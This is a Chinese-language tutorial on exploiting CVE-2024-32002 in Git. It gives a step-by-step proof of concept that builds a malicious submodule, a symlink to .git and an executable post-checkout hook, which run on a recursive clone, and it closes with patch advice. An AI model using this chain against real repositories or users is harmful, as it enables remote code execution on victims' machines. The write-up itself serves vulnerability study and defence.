深入剖析CVE-2024–32002：通过git clone实现远程代码执行

Exploiting CVE-2024–32002: Git RCE via git clone

概述

首先，我们来了解一下这个漏洞。CVE-2024–32002 (CVSS 9.1) 是一个发生在 Git 中的严重级别（Critical）漏洞。攻击者通过 git clone 命令克隆一个恶意仓库，并且必须使用 --recursive 选项，即可实现远程代码执行（RCE）。这意味着攻击者可以从远程运行预先隐藏的命令。

受影响的版本：

• v2.45.0
• v2.44.0
• <= v2.43.3
• <= v2.42.1
• v2.41.0
• <= v2.40.1
• <= v2.39.3

已修补的版本：

• v2.45.1
• v2.44.1
• v2.43.4
• v2.42.2
• v2.41.1
• v2.40.2
• v2.39.4

该漏洞已于 2024 年 5 月 14 日星期二修补。

漏洞分析

根据官方公告：https://github.com/git/git/security/advisories/GHSA-8h77-4q3w-gfgv

包含子模块的 Git 仓库可以创建一个路径，通过在 .git/ 目录中写入文件（而不是写入子模块的工作区）来触发 Git 中的漏洞。这种方法允许写入钩子（hook）（一种在 Git 仓库中发生特定事件时自动运行的脚本）。在这种情况下，钩子将在运行 git clone 命令时执行，导致用户没有机会在代码运行前进行检查。

符号链接

符号链接（symlinks 或 symbolic links）是充当指向其他文件或目录指针的系统文件。在 Git 的上下文中，它可以从当前仓库引用其他部分。虽然这种方法很方便，但符号链接也可能被用于其他恶意目的，从而对系统产生负面影响。

演示环境设置

让我们从设置用于演示的机器上的 Git 配置开始，使用以下命令：

git config --global protocol.file.allow always
git config --global core.symlinks true

命令解释：

• git config --global protocol.file.allow always：此命令用于设置 Git 始终允许使用 file:// 协议进行操作。
• git config --global core.symlinks true：此命令将设置 Git 能够创建和管理符号链接，而不是将其视为包含链接内容的普通文本文件。

在你的 GitHub 账户中创建两个空仓库用于测试，分别命名为 git_rce 和 hook。

创建 git_rce 仓库：

创建 hook 仓库：

完成上述步骤后，从我们刚刚在 GitHub 上创建的仓库中 git clone 这两个仓库到你想要测试的机器上。

进入 hook/ 目录，然后在其中创建 y/ 目录和 hooks/ 目录：

cd hook/
mkdir -p y/hooks

在 hook 目录中创建一个名为 post-checkout 的文件，并添加你想要执行的命令。在本文中，我们使用打开计算器的命令（适用于 Windows & Mac），以及将单词 "pwned!!" 写入 /tmp 目录中 pwned 文件的命令。

添加完我们想要的命令后，我们使 post-checkout 文件可执行，使用命令：

git update-index --chmod=+x y/hooks/post-checkout

命令解释：

• git update-index：此命令将在提交到 Git 仓库之前，根据条件创建更改。
• --chmod=+x：这是 git update-index 命令的一个选项，用于指示 Git 更改文件的权限，使其可执行。
• y/hooks/post-checkout：需要更改权限的文件路径。

准备好所有文件后，使用以下命令推送到 hook 仓库：

git add .
git commit -m "first commit"
git push origin main

命令解释：

• git add .：此命令将当前目录中的所有文件添加到 Git，以便在下一步提交。
• git commit -m "first commit"：此命令将从前一个命令的快照文件中，并为每个文件附加消息或注释，以便于跟踪每个文件的更改历史。
• git push origin main：此命令将上传已提交的所有内容到我们链接的 Git 仓库，在本例中就是 hook 仓库。

回到之前我们 git clone 下来的 git_rce 目录。

利用过程

使用 git submodule add 命令将 hook/ 仓库添加为此仓库的子模块：

git submodule add --name x/y "git@github.com:Jockky-dev/hook.git" A/modules/x

命令解释：

• git submodule add：用于添加子模块，该子模块将引用另一个仓库，以便在当前仓库中工作。
• --name x/y：用于指定子模块在当前仓库中的引用名称，以便相互引用。其中 x 表示顶级目录或根目录（/），y 表示子目录或将被调用的目录。
• git@github.com:Jockky-dev/hook.git：我们想要添加的子模块的 URL。
• A/modules/x：当前仓库中将用于克隆子模块的路径，其中 A 表示顶级目录（/），modules 表示仓库内的子目录，x 是子模块将被拉取到的路径。

添加子模块后，接下来是创建符号链接作为两个仓库之间的指针。

printf ".git" > dotgit.txt
git hash-object -w --stdin < dotgit.txt > dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info

首先，创建一个名为 dotgit.txt 的文件，并将单词 .git 添加为内容。

命令解释 git hash-object -w --stdin < dotgit.txt > dot-git.hash：

• git hash-object：用于计算指定文件的 SHA-1 哈希值的命令。
• -w：指示 Git 在计算哈希值后将文件写入 Git 对象数据库的选项。
• --stdin：指示 Git 从标准输入读取数据，而不是命令中指定的文件。
• < dotgit.txt：指定通过从 dotgit.txt 文件中提取内容作为输入，然后输入到 git hash-object 命令中。
• > dot-git.hash：指定将前一步的输出保存到 dot-git.hash 文件中。

命令解释 printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info：

• printf：用于格式化并按需打印字符的命令。
• "120000 %s 0\ta\n"：
  • 120000：指定文件的权限模式，120000 表示指定为符号链接。
  • %s：从输入中获取（在本命令中是从 dot-git.hash 文件获取）并替换此位置的字符串。
  • 0：指定阶段号或提交前的版本，0 表示未包含其他分支、合并阶段提交的当前点。
  • \t：用于分隔或制表输出结果（使字符不连在一起）的转义序列。
  • a：符号链接将放置在仓库中的路径名称。
  • \n：用于在命令结束时换行。
• $(cat dot-git.hash)：读取 dot-git.hash 文件并将值替换到命令中 %s 位置的命令。
• > index.info：将命令的最终结果保存到 index.info 文件中。

注意： 在 Git 中，每个文件都被指定为一个 SHA-1 哈希值。对于符号链接，它是一个指向之前创建的符号链接路径的链接。

运行上述命令后，我们将得到类似于图中示例的输出。

使用 index.info 文件作为输入来更新 Git 索引：

git update-index --index-info < index.info

命令解释 git update-index --index-info < index.info：

• git update-index：将在提交到 Git 仓库之前根据条件创建更改的命令。
• --index-info：指示 Git 从指定的输入中获取内容以用于命令的选项。
• < index.info：指定将用作前一个选项输入的文件名。
• git ls-files --stage：用于列出文件信息及其阶段，根据模式输出：<mode> <object hash> <stage>\t<path>。

准备好所有文件后，使用以下命令推送到 git_rce 仓库：

git commit -m "symbolic link added"
git push origin main

检查 git_rce 和 hook 仓库中，我们上传的所有文件是否完成。

一切准备就绪后，我们就可以开始攻击了。

攻击演示

注意： 别忘了在 git clone 命令中加入 --recursive 选项才能使漏洞利用生效。

git clone --recursive git@github.com:Jockky-dev/git_rce.git cve-2024-32002-exploited

修补（Patch）方法

1. 将 Git 更新到最新版本：

   • 对于 Windows：git update-git-for-windows
     
   • 对于 Linux (Unix)：

     sudo apt update -y
     sudo apt full-upgrade -y
     

2. 在 Git 中禁用符号链接使用，使用命令：

   git config --global core.symlinks false
   

3. 避免克隆来源未知的项目 禁用 Git 中的符号链接使用（git config --global core.symlinks false），当然最好的方法是避免克隆来源未知的项目。

参考资料

• https://nvd.nist.gov/vuln/detail/CVE-2024-32002
• https://en.wikipedia.org/wiki/Symbolic_link
• https://github.com/git/git/security/advisories/GHSA-8h77-4q3w-gfgv
• https://git-scm.com/docs/git-clone#Documentation/git-clone.txt---recurse-submodulesltpathspecgt
• https://git-scm.com/docs/git-config#Documentation/git-config.txt-coresymlinks
  CSD0tFqvECLokhw9aBeRqpG/NCS8B24x7B65YcX9iF1NeCL/Z53ORp+3P0Do0x1a8g7sfn9CmJcTbDE1x4LiM1WmIRQ6tP3HLOsYKttlyUd12HdNehSJOS1k7votv6hwMr7Acm8cnFc4S4U6o+wThOJcDmi58RHRL/l16BLw7Eo=
  更多精彩内容 请关注我的个人公众号 公众号（办公AI智能小助手）
  对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号（网络安全技术点滴分享）

公众号二维码

公众号二维码